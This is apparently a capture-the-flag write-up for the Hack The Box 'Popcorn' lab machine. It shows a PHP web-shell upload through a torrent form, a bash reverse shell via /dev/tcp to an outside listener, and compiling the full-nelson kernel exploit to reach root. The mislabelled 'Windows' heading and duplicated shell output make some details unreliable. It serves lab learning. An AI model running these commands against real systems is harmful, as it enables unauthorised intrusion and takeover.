Machine - Medium Windows - Popcorn

IP 10.10.10.6

Contents

• Tools
• Enumeration
• Exploitation
• Priviledge Escalation

Tools

• Nmap
• gobuster / dirb / dirbuster
• Burp Suite Community Edition / OWASP ZAP
• NetCat
• linux-exploit-suggester.sh /SearchExploit (OFFSEC exploitDB) / Google

Enumeration

• Nmap with nmap -A 10.10.10.6 gives two open ports, port 22 for ssh and 80 for http.
• On port 80 running gobuster with gobuster dir -u http://10.10.10.6 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 40 gives some links as output. Output shows some links, /test, /index, /torrent etc.
• /test page shows phpinfo allowed file upload.
• On /torrent page we can see sign up and log in option.

Exploitation

• After loggin in we can use the upload option. During uploading torrent file, we can modify filename and filecontent to php shell code with burp suite or OWASP ZAP.
• We can goto /torrent/upload directory to get our file and simple curl http://10.10.10.6/torrent/upload/3like1share3folllow3subscribe7.php?test=whoami will execute command on the server.
• Running netcat client on host with nc -lvnp 1337 and command curl http://10.10.10.6/torrent/upload/0ba973670d943861fb9453eecefd3bf7d3054713.php --data-urlencode "test=bash -c 'bash -i >& /dev/tcp/10.10.14.100/1337 0>&1'" will give us shell as user www-data.
• Now we can simply get user.txt as www-data for user george with command cat /home/george/user.txt.

  www-data@popcorn: ls /home
  george
  www-data@popcorn: cat /home/george/user.txt
  userflaglikesharesubscribefollow
  

Priviledge Escalation

• After importing linux-exploit-suggester.sh we can get a lot of priviledge escalation exploits.
• One of them is full-nelson (http://vulnfactory.org/exploits/full-nelson.c). After importing it to the machine, we can compile it with gcc full-nelson.c -o full-nelson.
• Then We get root and root flag.

  www-data@popcorn:tmp$ gcc full-nelson.c - exploit
  gcc full-nelson.c - exploit
  www-data@popcorn:tmp$ chmod +x exploit
  chmod +x exploit
  www-data@popcorn:tmp$ ./exploit
  www-data@popcorn:tmp$ ./exploit
  www-data@popcorn:tmp$ ./exploit
  ./exploit
  id
  uid=0(root) gid=0(root)
  cat /root/root.txt
  rootflaglikesharesubscribefollow
  

• Also dirtycow, motd and many other exploits are possible. As the server kernel version is too old.

Author: Zishan Ahamed Thandar